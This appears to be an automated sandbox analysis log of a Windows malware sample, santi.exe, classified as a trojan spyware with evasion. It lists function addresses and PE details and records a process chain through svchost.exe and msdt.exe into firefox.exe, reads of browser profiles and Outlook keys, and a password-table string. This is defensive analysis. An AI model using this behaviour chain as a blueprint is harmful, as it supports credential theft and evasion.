                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_006F2D807_2_006F2D80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_006FFE437_2_006FFE43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_006FFE3A7_2_006FFE3A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_007067B37_2_007067B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FA3527_2_032FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324E3F07_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_033003E67_2_033003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E02747_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C02C07_2_032C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032301007_2_03230100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032DA1187_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032C81587_2_032C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_033001AA7_2_033001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F81CC7_2_032F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032407707_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032647507_2_03264750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323C7C07_2_0323C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325C6E07_2_0325C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032405357_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_033005917_2_03300591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F24467_2_032F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032EE4F67_2_032EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FAB407_2_032FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F6BD77_2_032F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323EA807_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032569627_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032429A07_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0330A9A67_2_0330A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324A8407_2_0324A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032428407_2_03242840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032268B87_2_032268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0326E8F07_2_0326E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03282F287_2_03282F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03260F307_2_03260F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B4F407_2_032B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032BEFA07_2_032BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324CFE07_2_0324CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03232FC87_2_03232FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FEE267_2_032FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240E597_2_03240E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03252E907_2_03252E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FCE937_2_032FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FEEDB7_2_032FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324AD007_2_0324AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03258DBF7_2_03258DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0323ADE07_2_0323ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03240C007_2_03240C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E0CB57_2_032E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03230CF27_2_03230CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F132D7_2_032F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322D34C7_2_0322D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0328739A7_2_0328739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032452A07_2_032452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032E12ED7_2_032E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325B2C07_2_0325B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0327516C7_2_0327516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0322F1727_2_0322F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0330B16B7_2_0330B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0324B1B07_2_0324B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F70E97_2_032F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FF0E07_2_032FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032EF0CC7_2_032EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032470C07_2_032470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FF7B07_2_032FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F16CC7_2_032F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F75717_2_032F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032DD5B07_2_032DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FF43F7_2_032FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032314607_2_03231460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FFB767_2_032FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325FB807_2_0325FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B5BF07_2_032B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0327DBF97_2_0327DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B3A6C7_2_032B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FFA497_2_032FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F7A467_2_032F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032DDAAC7_2_032DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03285AA07_2_03285AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032EDAC67_2_032EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032499507_2_03249950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325B9507_2_0325B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032AD8007_2_032AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032438E07_2_032438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FFF097_2_032FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FFFB17_2_032FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03241F927_2_03241F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03249EB07_2_03249EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F7D737_2_032F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03243D407_2_03243D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032F1D5A7_2_032F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0325FDC07_2_0325FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B9C327_2_032B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032FFCF27_2_032FFCF2
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053EADF610_2_053EADF6
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_0540149810_2_05401498
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053E26F810_2_053E26F8
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053E26EF10_2_053E26EF
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053E291810_2_053E2918
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053E906810_2_053E9068
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053E0A3510_2_053E0A35
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053E0A4810_2_053E0A48
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeCode function: 10_2_053E0A9110_2_053E0A91
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047F442011_2_047F4420
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047FE4F611_2_047FE4F6
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480244611_2_04802446
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0481059111_2_04810591
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0475053511_2_04750535
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0476C6E011_2_0476C6E0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0475077011_2_04750770
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0477475011_2_04774750
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0474C7C011_2_0474C7C0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047E200011_2_047E2000
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_048041A211_2_048041A2
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047D815811_2_047D8158
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_048101AA11_2_048101AA
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_048081CC11_2_048081CC
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047EA11811_2_047EA118
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0474010011_2_04740100
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047F027411_2_047F0274
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047D02C011_2_047D02C0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_048103E611_2_048103E6
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0475E3F011_2_0475E3F0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480A35211_2_0480A352
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04750C0011_2_04750C00
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04740CF211_2_04740CF2
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047F0CB511_2_047F0CB5
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047ECD1F11_2_047ECD1F
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0475AD0011_2_0475AD00
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0474ADE011_2_0474ADE0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04768DBF11_2_04768DBF
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480CE9311_2_0480CE93
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04750E5911_2_04750E59
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480EEDB11_2_0480EEDB
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480EE2611_2_0480EE26
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04762E9011_2_04762E90
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047C4F4011_2_047C4F40
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04770F3011_2_04770F30
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047F2F3011_2_047F2F30
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04792F2811_2_04792F28
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0475CFE011_2_0475CFE0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04742FC811_2_04742FC8
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047CEFA011_2_047CEFA0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0475284011_2_04752840
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0475A84011_2_0475A840
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0477E8F011_2_0477E8F0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047368B811_2_047368B8
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0476696211_2_04766962
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0481A9A611_2_0481A9A6
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047529A011_2_047529A0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0474EA8011_2_0474EA80
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04806BD711_2_04806BD7
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480AB4011_2_0480AB40
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0474146011_2_04741460
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480F43F11_2_0480F43F
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047ED5B011_2_047ED5B0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480757111_2_04807571
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_048016CC11_2_048016CC
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480F7B011_2_0480F7B0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480F0E011_2_0480F0E0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_048070E911_2_048070E9
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047FF0CC11_2_047FF0CC
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047570C011_2_047570C0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0473F17211_2_0473F172
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0478516C11_2_0478516C
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0475B1B011_2_0475B1B0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0481B16B11_2_0481B16B
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047F12ED11_2_047F12ED
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0476B2C011_2_0476B2C0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047552A011_2_047552A0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0473D34C11_2_0473D34C
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480132D11_2_0480132D
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0479739A11_2_0479739A
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047C9C3211_2_047C9C32
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480FCF211_2_0480FCF2
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04753D4011_2_04753D40
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0476FDC011_2_0476FDC0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04801D5A11_2_04801D5A
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04807D7311_2_04807D73
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04759EB011_2_04759EB0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480FFB111_2_0480FFB1
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480FF0911_2_0480FF09
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04751F9211_2_04751F92
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047BD80011_2_047BD800
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047538E011_2_047538E0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0475995011_2_04759950
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0476B95011_2_0476B950
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047E591011_2_047E5910
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047C3A6C11_2_047C3A6C
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047FDAC611_2_047FDAC6
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04807A4611_2_04807A46
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480FA4911_2_0480FA49
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047EDAAC11_2_047EDAAC
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04795AA011_2_04795AA0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047F1AA311_2_047F1AA3
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0478DBF911_2_0478DBF9
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_047C5BF011_2_047C5BF0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0480FB7611_2_0480FB76
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0476FB8011_2_0476FB80
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_00421F0011_2_00421F00
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0041CE4011_2_0041CE40
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0041CE3711_2_0041CE37
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0041B04011_2_0041B040
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0041D06011_2_0041D060
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0041B1D911_2_0041B1D9
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0041B18411_2_0041B184
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0041B19011_2_0041B190
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_004255A011_2_004255A0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_004237B011_2_004237B0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0043BBE011_2_0043BBE0
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_043AE43511_2_043AE435
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_043AE7CD11_2_043AE7CD
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_043AE31811_2_043AE318
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_043AD89811_2_043AD898
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_043ACAFE11_2_043ACAFE
                Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_043ACB3811_2_043ACB38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 99 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 37 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 269 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 105 times
                Source: C:\Users\user\Desktop\santi.exeCode function: String function: 00306AC0 appears 42 times
                Source: C:\Users\user\Desktop\santi.exeCode function: String function: 0030F8A0 appears 35 times
                Source: C:\Users\user\Desktop\santi.exeCode function: String function: 002FEC2F appears 68 times
                Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 047CF290 appears 105 times
                Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04785130 appears 58 times
                Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 047BEA12 appears 86 times
                Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04797E54 appears 102 times
                Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0473B970 appears 277 times
                Source: santi.exe, 00000000.00000003.1291237018.00000000037C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs santi.exe
                Source: santi.exe, 00000000.00000003.1291422646.000000000396D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs santi.exe
                Source: santi.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@10/9
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0032CE7A GetLastError,FormatMessageW,0_2_0032CE7A
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0031AB84 AdjustTokenPrivileges,CloseHandle,0_2_0031AB84
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0031B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0031B134
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0032E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0032E1FD
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_00326532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00326532
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_0033C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0033C18C
                Source: C:\Users\user\Desktop\santi.exeCode function: 0_2_002E406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_002E406B
                Source: C:\Users\user\Desktop\santi.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut9282.tmpJump to behavior
                Source: santi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\santi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: msdt.exe, 0000000B.00000003.1914772603.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.0000000000605000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.0000000000627000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.00000000005FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: santi.exeReversingLabs: Detection: 60%
                Source: santi.exeVirustotal: Detection: 47%
                Source: unknownProcess created: C:\Users\user\Desktop\santi.exe "C:\Users\user\Desktop\santi.exe"
                Source: C:\Users\user\Desktop\santi.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\santi.exe"
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeProcess created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"
                Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\santi.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\santi.exe"Jump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeProcess created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\santi.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\santi.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\santi.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\santi.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\santi.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\santi.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\santi.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\santi.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\santi.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\santi.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\santi.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\msdt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: santi.exeStatic file information: File size 1214464 > 1048576
                Source: santi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: santi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: santi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
